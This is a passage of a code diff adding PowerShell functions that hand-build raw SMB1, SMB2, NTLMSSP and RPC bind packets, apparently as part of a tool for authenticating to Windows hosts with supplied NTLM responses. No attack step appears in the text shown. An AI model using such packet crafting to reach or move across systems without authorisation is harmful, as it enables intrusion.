+ $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_ByteCount",$packet_named_pipe_length)
+ $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_Filename",$packet_named_pipe)
+
+ return $packet_SMBNTCreateAndXRequest
+ }
+
+ function Get-PacketSMBReadAndXRequest()
+ {
+ $packet_SMBReadAndXRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_WordCount",[Byte[]](0x0a))
+ $packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_AndXCommand",[Byte[]](0xff))
+ $packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_Reserved",[Byte[]](0x00))
+ $packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_AndXOffset",[Byte[]](0x00,0x00))
+ $packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_FID",[Byte[]](0x00,0x40))
+ $packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_Offset",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_MaxCountLow",[Byte[]](0x58,0x02))
+ $packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_MinCount",[Byte[]](0x58,0x02))
+ $packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_Unknown",[Byte[]](0xff,0xff,0xff,0xff))
+ $packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_Remaining",[Byte[]](0x00,0x00))
+ $packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_ByteCount",[Byte[]](0x00,0x00))
+
+ return $packet_SMBReadAndXRequest
+ }
+
+ function Get-PacketSMBWriteAndXRequest()
+ {
+ param([Int]$packet_RPC_length)
+
+ [Byte[]]$packet_write_length = [System.BitConverter]::GetBytes($packet_RPC_length + 24)
+ $packet_write_length = $packet_write_length[0,1]
+
+ $packet_SMBWriteAndXRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_WordCount",[Byte[]](0x0e))
+ $packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_AndXCommand",[Byte[]](0xff))
+ $packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_Reserved",[Byte[]](0x00))
+ $packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_AndXOffset",[Byte[]](0x00,0x00))
+ $packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_FID",[Byte[]](0x00,0x40))
+ $packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_Offset",[Byte[]](0xea,0x03,0x00,0x00))
+ $packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_Reserved2",[Byte[]](0xff,0xff,0xff,0xff))
+ $packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_WriteMode",[Byte[]](0x08,0x00))
+ $packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_Remaining",[Byte[]](0x50,0x00))
+ $packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_DataLengthHigh",[Byte[]](0x00,0x00))
+ $packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_DataLengthLow",$packet_write_length)
+ $packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_DataOffset",[Byte[]](0x3f,0x00))
+ $packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_HighOffset",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_ByteCount",$packet_write_length)
+
+ return $packet_SMBWriteAndXRequest
+ }
+
+ function Get-PacketSMBCloseRequest()
+ {
+ param ([Byte[]]$packet_file_ID)
+
+ $packet_SMBCloseRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMBCloseRequest.Add("SMBCloseRequest_WordCount",[Byte[]](0x03))
+ $packet_SMBCloseRequest.Add("SMBCloseRequest_FID",$packet_file_ID)
+ $packet_SMBCloseRequest.Add("SMBCloseRequest_LastWrite",[Byte[]](0xff,0xff,0xff,0xff))
+ $packet_SMBCloseRequest.Add("SMBCloseRequest_ByteCount",[Byte[]](0x00,0x00))
+
+ return $packet_SMBCloseRequest
+ }
+
+ function Get-PacketSMBTreeDisconnectRequest()
+ {
+ $packet_SMBTreeDisconnectRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMBTreeDisconnectRequest.Add("SMBTreeDisconnectRequest_WordCount",[Byte[]](0x00))
+ $packet_SMBTreeDisconnectRequest.Add("SMBTreeDisconnectRequest_ByteCount",[Byte[]](0x00,0x00))
+
+ return $packet_SMBTreeDisconnectRequest
+ }
+
+ function Get-PacketSMBLogoffAndXRequest()
+ {
+ $packet_SMBLogoffAndXRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMBLogoffAndXRequest.Add("SMBLogoffAndXRequest_WordCount",[Byte[]](0x02))
+ $packet_SMBLogoffAndXRequest.Add("SMBLogoffAndXRequest_AndXCommand",[Byte[]](0xff))
+ $packet_SMBLogoffAndXRequest.Add("SMBLogoffAndXRequest_Reserved",[Byte[]](0x00))
+ $packet_SMBLogoffAndXRequest.Add("SMBLogoffAndXRequest_AndXOffset",[Byte[]](0x00,0x00))
+ $packet_SMBLogoffAndXRequest.Add("SMBLogoffAndXRequest_ByteCount",[Byte[]](0x00,0x00))
+
+ return $packet_SMBLogoffAndXRequest
+ }
+
+ #SMB2
+
+ function Get-PacketSMB2Header()
+ {
+ param([Byte[]]$packet_command,[Int]$packet_message_ID,[Byte[]]$packet_tree_ID,[Byte[]]$packet_session_ID)
+
+ [Byte[]]$packet_message_ID = [System.BitConverter]::GetBytes($packet_message_ID) + 0x00,0x00,0x00,0x00
+
+ $packet_SMB2Header = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMB2Header.Add("SMB2Header_ProtocolID",[Byte[]](0xfe,0x53,0x4d,0x42))
+ $packet_SMB2Header.Add("SMB2Header_StructureSize",[Byte[]](0x40,0x00))
+ $packet_SMB2Header.Add("SMB2Header_CreditCharge",[Byte[]](0x01,0x00))
+ $packet_SMB2Header.Add("SMB2Header_ChannelSequence",[Byte[]](0x00,0x00))
+ $packet_SMB2Header.Add("SMB2Header_Reserved",[Byte[]](0x00,0x00))
+ $packet_SMB2Header.Add("SMB2Header_Command",$packet_command)
+ $packet_SMB2Header.Add("SMB2Header_CreditRequest",[Byte[]](0x00,0x00))
+ $packet_SMB2Header.Add("SMB2Header_Flags",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2Header.Add("SMB2Header_NextCommand",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2Header.Add("SMB2Header_MessageID",$packet_message_ID)
+ $packet_SMB2Header.Add("SMB2Header_Reserved2",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2Header.Add("SMB2Header_TreeID",$packet_tree_ID)
+ $packet_SMB2Header.Add("SMB2Header_SessionID",$packet_session_ID)
+ $packet_SMB2Header.Add("SMB2Header_Signature",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+
+ return $packet_SMB2Header
+ }
+
+ function Get-PacketSMB2NegotiateProtocolRequest()
+ {
+ $packet_SMB2NegotiateProtocolRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_StructureSize",[Byte[]](0x24,0x00))
+ $packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_DialectCount",[Byte[]](0x02,0x00))
+ $packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_SecurityMode",[Byte[]](0x01,0x00))
+ $packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_Reserved",[Byte[]](0x00,0x00))
+ $packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_Capabilities",[Byte[]](0x40,0x00,0x00,0x00))
+ $packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_ClientGUID",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_NegotiateContextOffset",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_NegotiateContextCount",[Byte[]](0x00,0x00))
+ $packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_Reserved2",[Byte[]](0x00,0x00))
+ $packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_Dialect",[Byte[]](0x02,0x02))
+ $packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_Dialect2",[Byte[]](0x10,0x02))
+
+ return $packet_SMB2NegotiateProtocolRequest
+ }
+
+ function Get-PacketSMB2SessionSetupRequest()
+ {
+ param([Byte[]]$packet_security_blob)
+
+ [Byte[]]$packet_security_blob_length = [System.BitConverter]::GetBytes($packet_security_blob.Length)
+ $packet_security_blob_length = $packet_security_blob_length[0,1]
+
+ $packet_SMB2SessionSetupRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_StructureSize",[Byte[]](0x19,0x00))
+ $packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_Flags",[Byte[]](0x00))
+ $packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_SecurityMode",[Byte[]](0x01))
+ $packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_Capabilities",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_Channel",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_SecurityBufferOffset",[Byte[]](0x58,0x00))
+ $packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_SecurityBufferLength",$packet_security_blob_length)
+ $packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_PreviousSessionID",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_Buffer",$packet_security_blob)
+
+ return $packet_SMB2SessionSetupRequest
+ }
+
+ function Get-PacketSMB2TreeConnectRequest()
+ {
+ param([Byte[]]$packet_path)
+
+ [Byte[]]$packet_path_length = [System.BitConverter]::GetBytes($packet_path.Length)
+ $packet_path_length = $packet_path_length[0,1]
+
+ $packet_SMB2TreeConnectRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMB2TreeConnectRequest.Add("SMB2TreeConnectRequest_StructureSize",[Byte[]](0x09,0x00))
+ $packet_SMB2TreeConnectRequest.Add("SMB2TreeConnectRequest_Reserved",[Byte[]](0x00,0x00))
+ $packet_SMB2TreeConnectRequest.Add("SMB2TreeConnectRequest_PathOffset",[Byte[]](0x48,0x00))
+ $packet_SMB2TreeConnectRequest.Add("SMB2TreeConnectRequest_PathLength",$packet_path_length)
+ $packet_SMB2TreeConnectRequest.Add("SMB2TreeConnectRequest_Buffer",$packet_path)
+
+ return $packet_SMB2TreeConnectRequest
+ }
+
+ function Get-PacketSMB2CreateRequestFile()
+ {
+ param([Byte[]]$packet_named_pipe)
+
+ $packet_named_pipe_length = [System.BitConverter]::GetBytes($packet_named_pipe.Length)
+ $packet_named_pipe_length = $packet_named_pipe_length[0,1]
+
+ $packet_SMB2CreateRequestFile = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_StructureSize",[Byte[]](0x39,0x00))
+ $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_Flags",[Byte[]](0x00))
+ $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_RequestedOplockLevel",[Byte[]](0x00))
+ $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_Impersonation",[Byte[]](0x02,0x00,0x00,0x00))
+ $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_SMBCreateFlags",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_Reserved",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_DesiredAccess",[Byte[]](0x03,0x00,0x00,0x00))
+ $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_FileAttributes",[Byte[]](0x80,0x00,0x00,0x00))
+ $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_ShareAccess",[Byte[]](0x01,0x00,0x00,0x00))
+ $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_CreateDisposition",[Byte[]](0x01,0x00,0x00,0x00))
+ $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_CreateOptions",[Byte[]](0x40,0x00,0x00,0x00))
+ $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_NameOffset",[Byte[]](0x78,0x00))
+ $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_NameLength",$packet_named_pipe_length)
+ $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_CreateContextsOffset",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_CreateContextsLength",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_Buffer",$packet_named_pipe)
+
+ return $packet_SMB2CreateRequestFile
+ }
+
+ function Get-PacketSMB2ReadRequest()
+ {
+ param ([Byte[]]$packet_file_ID)
+
+ $packet_SMB2ReadRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMB2ReadRequest.Add("SMB2ReadRequest_StructureSize",[Byte[]](0x31,0x00))
+ $packet_SMB2ReadRequest.Add("SMB2ReadRequest_Padding",[Byte[]](0x50))
+ $packet_SMB2ReadRequest.Add("SMB2ReadRequest_Flags",[Byte[]](0x00))
+ $packet_SMB2ReadRequest.Add("SMB2ReadRequest_Length",[Byte[]](0x00,0x00,0x10,0x00))
+ $packet_SMB2ReadRequest.Add("SMB2ReadRequest_Offset",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $packet_SMB2ReadRequest.Add("SMB2ReadRequest_FileID",$packet_file_ID)
+ $packet_SMB2ReadRequest.Add("SMB2ReadRequest_MinimumCount",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2ReadRequest.Add("SMB2ReadRequest_Channel",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2ReadRequest.Add("SMB2ReadRequest_RemainingBytes",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2ReadRequest.Add("SMB2ReadRequest_ReadChannelInfoOffset",[Byte[]](0x00,0x00))
+ $packet_SMB2ReadRequest.Add("SMB2ReadRequest_ReadChannelInfoLength",[Byte[]](0x00,0x00))
+ $packet_SMB2ReadRequest.Add("SMB2ReadRequest_Buffer",[Byte[]](0x30))
+
+ return $packet_SMB2ReadRequest
+ }
+
+ function Get-PacketSMB2WriteRequest()
+ {
+ param([Byte[]]$packet_file_ID,[Int]$packet_RPC_length)
+
+ [Byte[]]$packet_write_length = [System.BitConverter]::GetBytes($packet_RPC_length + 24)
+
+ $packet_SMB2WriteRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMB2WriteRequest.Add("SMB2WriteRequest_StructureSize",[Byte[]](0x31,0x00))
+ $packet_SMB2WriteRequest.Add("SMB2WriteRequest_DataOffset",[Byte[]](0x70,0x00))
+ $packet_SMB2WriteRequest.Add("SMB2WriteRequest_Length",$packet_write_length)
+ $packet_SMB2WriteRequest.Add("SMB2WriteRequest_Offset",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $packet_SMB2WriteRequest.Add("SMB2WriteRequest_FileID",$packet_file_ID)
+ $packet_SMB2WriteRequest.Add("SMB2WriteRequest_Channel",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2WriteRequest.Add("SMB2WriteRequest_RemainingBytes",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2WriteRequest.Add("SMB2WriteRequest_WriteChannelInfoOffset",[Byte[]](0x00,0x00))
+ $packet_SMB2WriteRequest.Add("SMB2WriteRequest_WriteChannelInfoLength",[Byte[]](0x00,0x00))
+ $packet_SMB2WriteRequest.Add("SMB2WriteRequest_Flags",[Byte[]](0x00,0x00,0x00,0x00))
+
+ return $packet_SMB2WriteRequest
+ }
+
+ function Get-PacketSMB2CloseRequest()
+ {
+ param ([Byte[]]$packet_file_ID)
+
+ $packet_SMB2CloseRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMB2CloseRequest.Add("SMB2CloseRequest_StructureSize",[Byte[]](0x18,0x00))
+ $packet_SMB2CloseRequest.Add("SMB2CloseRequest_Flags",[Byte[]](0x00,0x00))
+ $packet_SMB2CloseRequest.Add("SMB2CloseRequest_Reserved",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2CloseRequest.Add("SMB2CloseRequest_FileID",$packet_file_ID)
+
+ return $packet_SMB2CloseRequest
+ }
+
+ function Get-PacketSMB2TreeDisconnectRequest()
+ {
+ $packet_SMB2TreeDisconnectRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMB2TreeDisconnectRequest.Add("SMB2TreeDisconnectRequest_StructureSize",[Byte[]](0x04,0x00))
+ $packet_SMB2TreeDisconnectRequest.Add("SMB2TreeDisconnectRequest_Reserved",[Byte[]](0x00,0x00))
+
+ return $packet_SMB2TreeDisconnectRequest
+ }
+
+ function Get-PacketSMB2SessionLogoffRequest()
+ {
+ $packet_SMB2SessionLogoffRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMB2SessionLogoffRequest.Add("SMB2SessionLogoffRequest_StructureSize",[Byte[]](0x04,0x00))
+ $packet_SMB2SessionLogoffRequest.Add("SMB2SessionLogoffRequest_Reserved",[Byte[]](0x00,0x00))
+
+ return $packet_SMB2SessionLogoffRequest
+ }
+
+ #NTLM
+
+ function Get-PacketNTLMSSPNegotiate()
+ {
+ param([Byte[]]$packet_negotiate_flags,[Byte[]]$packet_version)
+
+ [Byte[]]$packet_NTLMSSP_length = [System.BitConverter]::GetBytes(32 + $packet_version.Length)
+ $packet_NTLMSSP_length = $packet_NTLMSSP_length[0]
+ [Byte[]]$packet_ASN_length_1 = $packet_NTLMSSP_length[0] + 32
+ [Byte[]]$packet_ASN_length_2 = $packet_NTLMSSP_length[0] + 22
+ [Byte[]]$packet_ASN_length_3 = $packet_NTLMSSP_length[0] + 20
+ [Byte[]]$packet_ASN_length_4 = $packet_NTLMSSP_length[0] + 2
+
+ $packet_NTLMSSPNegotiate = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_InitialContextTokenID",[Byte[]](0x60)) # the ASN.1 key names are likely not all correct
+ $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_InitialcontextTokenLength",$packet_ASN_length_1)
+ $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_ThisMechID",[Byte[]](0x06))
+ $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_ThisMechLength",[Byte[]](0x06))
+ $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_OID",[Byte[]](0x2b,0x06,0x01,0x05,0x05,0x02))
+ $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_InnerContextTokenID",[Byte[]](0xa0))
+ $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_InnerContextTokenLength",$packet_ASN_length_2)
+ $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_InnerContextTokenID2",[Byte[]](0x30))
+ $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_InnerContextTokenLength2",$packet_ASN_length_3)
+ $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechTypesID",[Byte[]](0xa0))
+ $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechTypesLength",[Byte[]](0x0e))
+ $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechTypesID2",[Byte[]](0x30))
+ $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechTypesLength2",[Byte[]](0x0c))
+ $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechTypesID3",[Byte[]](0x06))
+ $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechTypesLength3",[Byte[]](0x0a))
+ $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechType",[Byte[]](0x2b,0x06,0x01,0x04,0x01,0x82,0x37,0x02,0x02,0x0a))
+ $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechTokenID",[Byte[]](0xa2))
+ $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechTokenLength",$packet_ASN_length_4)
+ $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_NTLMSSPID",[Byte[]](0x04))
+ $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_NTLMSSPLength",$packet_NTLMSSP_length)
+ $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_Identifier",[Byte[]](0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00))
+ $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MessageType",[Byte[]](0x01,0x00,0x00,0x00))
+ $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_NegotiateFlags",$packet_negotiate_flags)
+ $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_CallingWorkstationDomain",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_CallingWorkstationName",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+
+ if($packet_version)
+ {
+ $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_Version",$packet_version)
+ }
+
+ return $packet_NTLMSSPNegotiate
+ }
+
+ function Get-PacketNTLMSSPAuth()
+ {
+ param([Byte[]]$packet_NTLM_response)
+
+ [Byte[]]$packet_NTLMSSP_length = [System.BitConverter]::GetBytes($packet_NTLM_response.Length)
+ $packet_NTLMSSP_length = $packet_NTLMSSP_length[1,0]
+ [Byte[]]$packet_ASN_length_1 = [System.BitConverter]::GetBytes($packet_NTLM_response.Length + 12)
+ $packet_ASN_length_1 = $packet_ASN_length_1[1,0]
+ [Byte[]]$packet_ASN_length_2 = [System.BitConverter]::GetBytes($packet_NTLM_response.Length + 8)
+ $packet_ASN_length_2 = $packet_ASN_length_2[1,0]
+ [Byte[]]$packet_ASN_length_3 = [System.BitConverter]::GetBytes($packet_NTLM_response.Length + 4)
+ $packet_ASN_length_3 = $packet_ASN_length_3[1,0]
+
+ $packet_NTLMSSPAuth = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_NTLMSSPAuth.Add("NTLMSSPAuth_ASNID",[Byte[]](0xa1,0x82))
+ $packet_NTLMSSPAuth.Add("NTLMSSPAuth_ASNLength",$packet_ASN_length_1)
+ $packet_NTLMSSPAuth.Add("NTLMSSPAuth_ASNID2",[Byte[]](0x30,0x82))
+ $packet_NTLMSSPAuth.Add("NTLMSSPAuth_ASNLength2",$packet_ASN_length_2)
+ $packet_NTLMSSPAuth.Add("NTLMSSPAuth_ASNID3",[Byte[]](0xa2,0x82))
+ $packet_NTLMSSPAuth.Add("NTLMSSPAuth_ASNLength3",$packet_ASN_length_3)
+ $packet_NTLMSSPAuth.Add("NTLMSSPAuth_NTLMSSPID",[Byte[]](0x04,0x82))
+ $packet_NTLMSSPAuth.Add("NTLMSSPAuth_NTLMSSPLength",$packet_NTLMSSP_length)
+ $packet_NTLMSSPAuth.Add("NTLMSSPAuth_NTLMResponse",$packet_NTLM_response)
+
+ return $packet_NTLMSSPAuth
+ }
+
+ #RPC
+
+ function Get-PacketRPCBind()
+ {
+ param([Int]$packet_call_ID,[Byte[]]$packet_max_frag,[Byte[]]$packet_num_ctx_items,[Byte[]]$packet_context_ID,[Byte[]]$packet_UUID,[Byte[]]$packet_UUID_version)
+
+ [Byte[]]$packet_call_ID_bytes = [System.BitConverter]::GetBytes($packet_call_ID)
+
+ $packet_RPCBind = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_RPCBind.Add("RPCBind_Version",[Byte[]](0x05))
+ $packet_RPCBind.Add("RPCBind_VersionMinor",[Byte[]](0x00))
+ $packet_RPCBind.Add("RPCBind_PacketType",[Byte[]](0x0b))
+ $packet_RPCBind.Add("RPCBind_PacketFlags",[Byte[]](0x03))
+ $packet_RPCBind.Add("RPCBind_DataRepresentation",[Byte[]](0x10,0x00,0x00,0x00))
+ $packet_RPCBind.Add("RPCBind_FragLength",[Byte[]](0x48,0x00))
+ $packet_RPCBind.Add("RPCBind_AuthLength",[Byte[]](0x00,0x00))
+ $packet_RPCBind.Add("RPCBind_CallID",$packet_call_ID_bytes)
+ $packet_RPCBind.Add("RPCBind_MaxXmitFrag",[Byte[]](0xb8,0x10))
+ $packet_RPCBind.Add("RPCBind_MaxRecvFrag",[Byte[]](0xb8,0x10))
+ $packet_RPCBind.Add("RPCBind_AssocGroup",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_RPCBind.Add("RPCBind_NumCtxItems",$packet_num_ctx_items)
+ $packet_RPCBind.Add("RPCBind_Unknown",[Byte[]](0x00,0x00,0x00))
+ $packet_RPCBind.Add("RPCBind_ContextID",$packet_context_ID)
+ $packet_RPCBind.Add("RPCBind_NumTransItems",[Byte[]](0x01))
+ $packet_RPCBind.Add("RPCBind_Unknown2",[Byte[]](0x00))
+ $packet_RPCBind.Add("RPCBind_Interface",$packet_UUID)
+ $packet_RPCBind.Add("RPCBind_InterfaceVer",$packet_UUID_version)
+ $packet_RPCBind.Add("RPCBind_InterfaceVerMinor",[Byte[]](0x00,0x00))
+ $packet_RPCBind.Add("RPCBind_TransferSyntax",[Byte[]](0x04,0x5d,0x88,0x8a,0xeb,0x1c,0xc9,0x11,0x9f,0xe8,0x08,0x00,0x2b,0x10,0x48,0x60))
+ $packet_RPCBind.Add("RPCBind_TransferSyntaxVer",[Byte[]](0x02,0x00,0x00,0x00))
+
+ if($packet_num_ctx_items[0] -eq 2)
+ {
+ $packet_RPCBind.Add("RPCBind_ContextID2",[Byte[]](0x01,0x00))
+ $packet_RPCBind.Add("RPCBind_NumTransItems2",[Byte[]](0x01))
+ $packet_RPCBind.Add("RPCBind_Unknown3",[Byte[]](0x00))
+ $packet_RPCBind.Add("RPCBind_Interface2",[Byte[]](0xc4,0xfe,0xfc,0x99,0x60,0x52,0x1b,0x10,0xbb,0xcb,0x00,0xaa,0x00,0x21,0x34,0x7a))
+ $packet_RPCBind.Add("RPCBind_InterfaceVer2",[Byte[]](0x00,0x00))
+ $packet_RPCBind.Add("RPCBind_InterfaceVerMinor2",[Byte[]](0x00,0x00))
+ $packet_RPCBind.Add("RPCBind_TransferSyntax2",[Byte[]](0x2c,0x1c,0xb7,0x6c,0x12,0x98,0x40,0x45,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $packet_RPCBind.Add("RPCBind_TransferSyntaxVer2",[Byte[]](0x01,0x00,0x00,0x00))
+ }
+ elseif($packet_num_ctx_items[0] -eq 3)
+ {
+ $packet_RPCBind.Add("RPCBind_ContextID2",[Byte[]](0x01,0x00))
+ $packet_RPCBind.Add("RPCBind_NumTransItems2",[Byte[]](0x01))
+ $packet_RPCBind.Add("RPCBind_Unknown3",[Byte[]](0x00))
+ $packet_RPCBind.Add("RPCBind_Interface2",[Byte[]](0x43,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46))
+ $packet_RPCBind.Add("RPCBind_InterfaceVer2",[Byte[]](0x00,0x00))
+ $packet_RPCBind.Add("RPCBind_InterfaceVerMinor2",[Byte[]](0x00,0x00))
+ $packet_RPCBind.Add("RPCBind_TransferSyntax2",[Byte[]](0x33,0x05,0x71,0x71,0xba,0xbe,0x37,0x49,0x83,0x19,0xb5,0xdb,0xef,0x9c,0xcc,0x36))
+ $packet_RPCBind.Add("RPCBind_TransferSyntaxVer2",[Byte[]](0x01,0x00,0x00,0x00))
+ $packet_RPCBind.Add("RPCBind_ContextID3",[Byte[]](0x02,0x00))
+ $packet_RPCBind.Add("RPCBind_NumTransItems3",[Byte[]](0x01))
+ $packet_RPCBind.Add("RPCBind_Unknown4",[Byte[]](0x00))
+ $packet_RPCBind.Add("RPCBind_Interface3",[Byte[]](0x43,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46))
+ $packet_RPCBind.Add("RPCBind_InterfaceVer3",[Byte[]](0x00,0x00))
+ $packet_RPCBind.Add("RPCBind_InterfaceVerMinor3",[Byte[]](0x00,0x00))
+ $packet_RPCBind.Add("RPCBind_TransferSyntax3",[Byte[]](0x2c,0x1c,0xb7,0x6c,0x12,0x98,0x40,0x45,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
